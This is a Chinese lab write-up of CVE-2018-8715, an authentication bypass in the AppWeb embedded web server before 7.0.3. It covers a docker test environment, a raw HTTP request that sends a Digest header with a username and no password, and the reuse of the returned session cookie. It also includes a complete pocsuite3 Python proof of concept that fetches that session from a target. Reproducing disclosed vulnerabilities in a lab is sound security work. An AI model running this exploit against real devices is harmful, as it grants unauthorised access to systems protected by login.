AppWeb认证绕过漏洞(CVE-2018-8715)
AppWeb是Embedthis Software LLC公司负责开发维护的一个基于GPL开源协议的嵌入式Web Server。他使用C/C++来编写,能够运行在几乎先进所有流行的操作系统上。当然他最主要的应用场景还是为嵌入式设备提供Web Application容器。
AppWeb可以进行认证配置,其认证方式包括以下三种:
- basic 传统HTTP基础认证
- digest 改进版HTTP基础认证,认证成功后将使用Cookie来保存状态,而不用再传递Authorization头
- form 表单认证
其7.0.3之前的版本中,对于digest和form两种认证方式,如果用户传入的密码为null
(也就是没有传递密码参数),appweb将因为一个逻辑错误导致直接认证成功,并返回session。
参考链接:
- https://ssd-disclosure.com/index.php/archives/3676
漏洞环境
执行如下命令启动一个带有digest认证的Appweb 7.0.1服务器:
docker-compose up -d
访问http://your-ip:8080
,可见需要输入账号密码。
漏洞复现
利用该漏洞需要知道一个已存在的用户名,当前环境下用户名为admin
。
构造头Authorization: Digest username=admin
,并发送如下数据包:
GET / HTTP/1.1
Host: example.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Authorization: Digest username=admin
可见,因为我们没有传入密码字段,所以服务端出现错误,直接返回了200,且包含一个session:
设置这个session到浏览器,即可正常访问需要认证的页面:
editthiscookie没有成功,后面是直接在浏览器里面编辑的:
脚本
"""
If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
for more about information, plz visit http://pocsuite.org
"""
from collections import OrderedDict
import requests
from pocsuite3.api import Output, POCBase, OptString, register_poc, POC_CATEGORY, OptDict
class DemoPOC(POCBase):
vulID = '97181' # ssvid
version = '1'
author = ['sumo']
vulDate = '2018-03-14'
createDate = '2018-03-15'
updateDate = '2018-03-15'
references = ['https://www.seebug.org/vuldb/ssvid-97181']
name = 'AppWeb认证绕过漏洞(CVE-2018-8715)'
appPowerLink = 'https://www.embedthis.com/'
appName = 'AppWeb'
appVersion = '< 7.0.3'
vulType = 'Login Bypass'
desc = '''
其7.0.3之前的版本中,对于digest和form两种认证方式,如果用户传入的密码为null
(也就是没有传递密码参数),appweb将因为一个逻辑错误导致直接认证成功,
并返回session。
'''
samples = ['http://10.10.100.92:8080/']
install_requires = []
category = POC_CATEGORY.EXPLOITS.WEBAPP
protocol = POC_CATEGORY.PROTOCOL.HTTP
def _options(self):
o = OrderedDict()
o["username"] = OptString('', description='这个poc需要用户输入登录账号', require=True)
return o
def _verify(self):
result = {}
playload = "Digest username=\"{0}\"".format(self.get_option("username"))
get_headers = {
'Proxy-Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9'
}
vul_url = self.url
if vul_url.endswith('/'):
vul_url = vul_url[:-1]
if "http://" in vul_url:
host = vul_url[7:]
elif "https://" in vul_url:
host = vul_url[8:]
else:
host = vul_url
get_headers['Host'] = host
get_headers['Authorization'] = playload
r = requests.get(url=vul_url, headers=get_headers)
if r.status_code == 200:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_url
result['VerifyInfo']['set-cookie'] = r.headers['set-cookie']
else:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_url
result['VerifyInfo']['set-cookie'] = get_headers
return self.parse_output(result)
def _attack(self):
return self._verify()
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('target is not vulnerable')
return output
register_poc(DemoPOC)
演示效果如下:
执行成功:
参考文献
https://blog.csdn.net/lingluofengzang/article/details/96275522